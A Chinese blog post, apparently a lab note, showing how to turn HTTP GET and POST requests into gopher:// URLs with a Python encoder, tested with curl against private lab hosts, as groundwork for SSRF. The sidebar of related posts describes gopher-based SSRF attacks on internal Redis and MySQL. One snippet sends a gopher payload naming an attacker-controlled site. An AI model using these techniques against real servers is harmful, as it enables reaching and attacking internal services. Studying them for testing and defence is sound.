gopher协议及ssrf

原创 已于 2022-08-24 23:14:08 修改 · 1.4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

于 2022-08-24 23:11:32 首次发布

文章目录

gopher协议

1.GET

1.最简单的get请求
GET /b.php?q=1 HTTP/1.1
Host: 192.168.47.244
2.gopher改写
gopher://192.168.47.244:80/_GET%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.244%0D%0A%0D%0A
使用的python脚本
import urllib.parse

ip = "192.168.47.244"
port = "80"
body = \
"""GET /b.php?q=1 HTTP/1.1
Host: 192.168.47.244

"""

body = urllib.parse.quote(body)
body = body.replace("%0A", "%0D%0A")
payload = f"gopher://{ip}:{port}/_" + body
print(payload)
3.测试

apcahe/2.4.43

php/7.4.*

curl/7.68.0

测试源码php

<?php
	if(isset($_GET['q'])){
		echo "Hello ".$_GET['q']."<br/>";
	}
?>
kali-curl测试
  • kali -> kali
curl gopher://192.168.47.162:80/_GET%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.162%0D%0A%0D%0A
HTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 08:54:01 GMT
Server: Apache/2.4.43 (Debian)
Content-Length: 12
Content-Type: text/html; charset=UTF-8

Hello 1<br/>
  • kali -> windows
curl gopher://192.168.47.244:80/_GET%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.244%0D%0A%0D%0A
HTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 09:00:37 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1f mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Content-Type: text/html

6
1<br/>
0
windows-curl测试
  • windows -> kali
curl gopher://192.168.47.244:80/_GET%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.244%0D%0A%0D%0A
HTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 10:02:18 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1f mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Content-Type: text/html

c
Hello 1<br/>
0
  • windows -> windows
curl gopher://192.168.47.162:80/_GET%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.162%0D%0A%0D%0A
HTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 10:01:31 GMT
Server: Apache/2.4.43 (Debian)
Content-Length: 12
Content-Type: text/html; charset=UTF-8

Hello 1<br/>

2.POST

1.最简单的post请求

post请求与get请求不同,post请求有四个字段是必须发送的

需要传递Content-Type,Content-Length,host,post的参数

Content-Type

Content-Length可以用Burpsuit自动补

POST /b.php?q=1 HTTP/1.1
Host: 192.168.47.244
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

q=Myname
2.gopher改写
gopher://192.168.47.244:80/_POST%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.244%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0AContent-Length%3A%208%0D%0A%0D%0Aq%3DMyname
python
import urllib.parse

ip = "192.168.47.244"
port = "80"
data = \
"""POST /b.php?q=1 HTTP/1.1
Host: 192.168.47.244
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

q=Myname"""

data = urllib.parse.quote(data)
data = data.replace("%0A", "%0D%0A")
payload = f"gopher://{ip}:{port}/_" + data
print(payload)
3.测试
1.kali-curl
  • kali -> kali
curl gopher://192.168.47.162:80/_POST%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.162%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0AContent-Length%3A%208%0D%0A%0D%0Aq%3DMyname
HTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 10:36:57 GMT
Server: Apache/2.4.43 (Debian)
Content-Length: 17
Content-Type: text/html; charset=UTF-8

Hello Myname<br/>u
  • kali -> windows
curl gopher://192.168.47.244:80/_POST%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.244%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0AContent-Length%3A%208%0D%0A%0D%0Aq%3DMynameHTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 10:34:34 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1f mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Content-Type: text/html

11
Hello Myname<br/>
0
2.windows-curl
  • windows -> kali
curl gopher://192.168.47.162:80/_POST%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.162%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0AContent-Length%3A%208%0D%0A%0D%0Aq%3DMyname
HTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 10:38:35 GMT
Server: Apache/2.4.43 (Debian)
Content-Length: 17
Content-Type: text/html; charset=UTF-8

Hello Myname<br/>
  • windows -> windows
curl gopher://192.168.47.244:80/_POST%20/b.php%3Fq%3D1%20HTTP/1.1%0D%0AHost%3A%20192.168.47.244%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0AContent-Length%3A%208%0D%0A%0D%0Aq%3DMyname
HTTP/1.1 200 OK
Date: Tue, 23 Aug 2022 10:37:44 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1f mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Content-Type: text/html

11
Hello Myname<br/>
0

3.响应不同问题

windows搭建的服务器对curl的响应与kali搭建的服务器对curl gopher协议的响应有一些差别,但都成功响应,目前不清楚原因。

4.curl

curl在7.79.1版本不支持gopher协议

UserNick157
关注
SSRF攻击与Gopher协议
RuiLike的博客
06-04 2610
Gopher定义Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;gopher支持发出GET、POST请求。
关于gopher协议ssrf攻击
qq_69775412的博客
04-26 3702
Gopher协议浅析 Gopher协议是internet的一个信息查找系统,俗称万能协议,可以通过gopher访问对应计算机上的其他资源,例如利用gopher实现:GET请求,POST请求,内网的redis,mysql(以及各类关系型数据库)未授权访问,以及MongoDB,Memcache等。 协议详情 端口 默认为70端口,可以自定义 协议格式 gopher://127.0.0.1:70/_[data] “
基础知识《Gopher协议
qq_46143339的博客
03-14 737
在万维网(WWW)普及前,Gopher曾是主要的互联网信息检索工具。其简洁的文本驱动界面和高效的层级结构使其在早期广受欢迎。然而,随着HTTP和HTML的兴起,Gopher逐渐被取代,但其设计理念(如结构化信息组织)对现代技术仍有影响。,通过TCP协议通信,默认端口为70。用户通过Gopher客户端浏览类似文件系统的目录结构,访问文本、图像等资源。Gopher是一种早期的互联网协议,设计于1991年,用于在网络上通过层次化菜单系统高效检索文本信息。
gopher协议
qq_50613938的博客
11-02 1158
gopher协议gopher协议 :互联网上使用的分布型的文件搜集获取网络协议,是一种分布式文档传递服务。利用该服务,用户可以无缝地浏览、搜索和检索驻留在不同位置的信息 使用方法:gopher://ip:port/_payload Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端
SSRF深度解析Gopher协议
qq_60115503的博客
04-25 5636
定义:Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;
Gopher协议ssrf
qq_44657899的博客
04-30 5058
文章目录0x01 reference和环境准备0x02 使用gopher构造GET、POST请求构造GET请求Gopher发送请求HTTP POST请求:0x03 CTF实战 0x01 reference和环境准备 参考 Gopher协议SSRF漏洞中的深入研究(附视频讲解) 参考 Gopher协议与redis未授权访问 Gopher协议格式: URL:gopher://<host>:<port>/<gopher-path>_后接TCP数据流 gopher的默认端
SSRF服务端请求&Gopher协议&白盒测试
2301_81155391的博客
12-29 1491
是什么SSRF?这个简单点说就是 服务端的请求伪造 就是这个如果是个 请求图片的网站 他的目的是请求外部其他网站的 图片 但是 SSRF指的是让他请求本地的图片 再展示出来 请求的是他的服务器上的图片SSRF(Server-Side Request Forgery:服务器端请求伪造)一种由攻击者构造形成由服务端发起请求的一个安全漏洞;一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
渗透系列:【防守方基础】危险报文识别+Gopher协议SSRF漏洞中的深入研究(附视频讲解)
01-08
渗透系列:【防守方基础】危险报文识别+Gopher协议SSRF漏洞中的深入研究(附视频讲解)
gopher攻击mysql_gopher 协议SSRF 中的一些利用
weixin_42131785的博客
02-05 1336
gopher 协议协议简介gopher 协议是一个在http 协议诞生前用来访问Internet 资源的协议可以理解为http 协议的前身或简化版,虽然很古老但现在很多库还支持gopher 协议而且gopher 协议功能很强大。它可以实现多个数据包整合发送,然后gopher 服务器将多个数据包捆绑着发送到客户端,这就是它的菜单响应。比如使用一条gopher 协议的curl 命令就能操作mysql ...
SSRF-gopher 协议扩展利用:突破网络限制的利器
weixin_43822401的博客
06-11 1132
Gopher 是一种在 HTTP 协议之前非常流行的信息查找系统,虽然现在已经被 HTTP 协议取代,但在 SSRF 漏洞利用中仍然发挥着重要作用。Gopher 协议可以将 HTTP 请求转换为 TCP 数据流,从而突破一些网络限制,例如防火墙。Gopher 协议作为 SSRF 漏洞利用的利器,可以帮助攻击者突破网络限制,实现更高级的攻击目标。为了防止 SSRF-gopher 协议漏洞,需要对用户输入进行严格的校验,并使用安全的编码和解码库。
flask-gopher:Flask扩展,支持Gopher协议
02-05
烧瓶地鼠 扩展以支持协议。 内容 演示版 在以下URL的gopherspace中提供了Flask-Gopher服务器的实时演示: gopher://mozz.us:7005 关于 什么是地鼠? Gopher是万维网的替代方案,后者在90年代初达到顶峰。 狂热者仍然维护着少数的地鼠站点。 您可以在了解有关其历史的更多信息。 什么是烧瓶球? Flask-Gopher是Flask扩展,它在内置的Web服务器周围添加了一个薄的Gopher-> HTTP兼容性层。 它允许您构建完全符合gopher服务器,并完全访问Flask的路由,模板引擎,调试器等! 这是给谁的 我创建此扩展是因为我想尝试构
SSRF利用 Gopher 协议拓展攻击面
热门推荐
BerL1n
11-25 1万+
1 概述 Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。 gophergopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是s...
SSRF利用协议中的万金油——Gopher
qq_50854662的博客
02-23 8358
SSRF利用协议中的万金油——Gopher
SSRF4 SSRF-gopher 协议扩展利用-向内网发起 GET/POST 请求
最新发布
2401_89464052的博客
06-17 1040
Gopher协议是一种早期的信息查找系统,现常用于SSRF漏洞攻击中,可对多种服务发起攻击。其语法格式为gopher://host:port/gopher-path/,其中下划线""用于规避第一个字符被丢弃的问题。实验表明,Gopher协议可构造GET和POST请求:GET请求需对请求行和Host头进行URL编码,替换换行符为%0D%0A;POST请求则需包含5行必要配置信息,可通过Python脚本自动完成编码。通过curl命令发送构造的Gopher协议请求,可实现完整的HTTP请求模拟
curl和gopher协议ssrf的利用)
Z_Grant的博客
11-05 8245
文章目录一、基础知识的学习(1) cURL(2) PHP的curl函数(3) gopher协议3.1 用gopher协议get传数据3.2 用gopher协议post传数据3.3 在ssrf中使用gopher协议(4) file协议和dict协议 一、基础知识的学习 (1) cURL cURL是一个利用URL语法在命令行下工作的文件传输工具。它支持文件上传和下载,所以是综合传输工具。cURL还包...
Gopher协议
2401_87096154的博客
06-01 444
Gopher是互联网早期的一种协议在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口利用gopher协议可以攻击内网的 Redis、Mysql、FastCGI、Ftp 等,也可以发送 GET、POST 请求,这可以拓宽 SSRF 的攻击面。
ssrf gopher
01-15
### 关于SSRF漏洞中的Gopher协议 在服务器端请求伪造(Server-Side Request Forgery, SSRF)攻击中,利用特定协议可以扩大攻击面并提升危害程度。其中一种值得注意的是 Gopher 协议。此协议允许客户端通过简单的字符串命令来获取远程资源,在某些情况下可被恶意利用。 当应用程序未充分验证用户输入即用于发起 HTTP 请求时,则可能存在 SSRF 风险[^1]。如果目标系统支持非标准 URL 方案如 `gopher://` 并且缺乏适当过滤机制的话,那么攻击者就有可能构造特殊形式的数据包以执行任意指令或读取本地文件等内容。 对于 Jira 这样的应用而言,已知存在可以通过精心设计的 URL 来触发内部服务调用的情况,这其中包括但不限于使用 gopher 协议来进行非法操作的可能性。为了防止此类问题的发生,开发人员应当严格控制对外部网络连接的支持范围,并实施白名单策略限制可用方案种类;同时还要注意对所有来自用户的参数做全面的安全审查。 ```python import requests url = "http://example.com/vulnerable_endpoint" payload = 'gopher://attacker-controlled-site/...' response = requests.get(url, params={'param': payload}) print(response.text) ``` 上述代码片段展示了如何向易受攻击的服务发送包含有潜在危险 URI 的 GET 请求。请注意实际环境中不应如此实现,而仅作为概念证明展示可能存在的风险点。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值